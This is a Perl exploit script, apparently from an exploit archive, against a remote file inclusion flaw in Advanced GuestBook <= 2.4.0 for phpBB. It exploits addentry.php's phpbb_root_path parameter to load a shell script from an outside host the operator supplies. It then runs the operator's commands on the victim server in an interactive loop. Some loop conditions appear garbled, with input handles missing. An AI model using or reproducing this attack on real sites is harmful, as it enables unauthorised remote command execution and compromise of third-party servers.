================================================================= Advanced GuestBook <= 2.4.0 (phpBB) Remote File Inclusion Exploit ================================================================= #!usr/bin/perl use LWP::UserAgent; # Bug Found by [Oo] # Exploit coded by n0m3rcy # Copyright (c) 2006 # Gr33tz; nukedx , Devil-00 , str0ke , cijfer # Usage; n0ag.pl if (@ARGV ne 3) { &usage; } else { &exploit; } sub header() { print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n"; print "+ Advanced GuestBook for phpBB <= 2.4.0 Remote File Inclusion Exploit +\r\n"; print "+ Bug found by [Oo] +\r\n"; print "+ Copyright (c) 2006 [email protected] +\r\n"; print "+ Gr33tz: nukedx , cijfer , str0ke , Devil-00 +\r\n"; print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n"; } sub usage() { &header; print "- Usage: $0 \r\n"; print "- -> Victim's target ex: www.victim.com/path/\r\n"; print "- -> www.milw0rm.com/shelltxt\r\n"; print "- -> cmd\r\n"; exit(); } sub exploit () { my $tar = $ARGV[0]; my $cmdt = $ARGV[1]; my $cmdv = $ARGV[2]; while() { print "[CMD] \$"; while() { $cmd=$_; chomp($cmd); my $exp = LWP::UserAgent->new() or die; my $go = HTTP::Request->new(GET =>$tar.' admin/addentry.php?phpbb_root_path='.$cmdt.'?&'.$cmdv.'='.$cmd)or die "\r\n[-] Connected fail\n"; my $rgo = $exp->request($go); my $return = $rgo->content; my $return =~ tr/[\n]/[?]/; if (!$cmd) { print "\nPlease Enter a Command\n\n"; $return =""; } elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in /) { print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit } elsif ($return =~/^.Fatal.error/) { print "\nInvalid Command or No Return\n\n" } if ($return =~ /(.*)/) { my $finreturn = $1; my $finreturn=~ tr/[?]/[\n]/; print "\r\n$finreturn\n\r"; print "[+] Exploit successed\r\n"; last; } else { print "[CMD] \$"; } last; } exit; } } # 0day.today [2018-01-03] #

Query Builder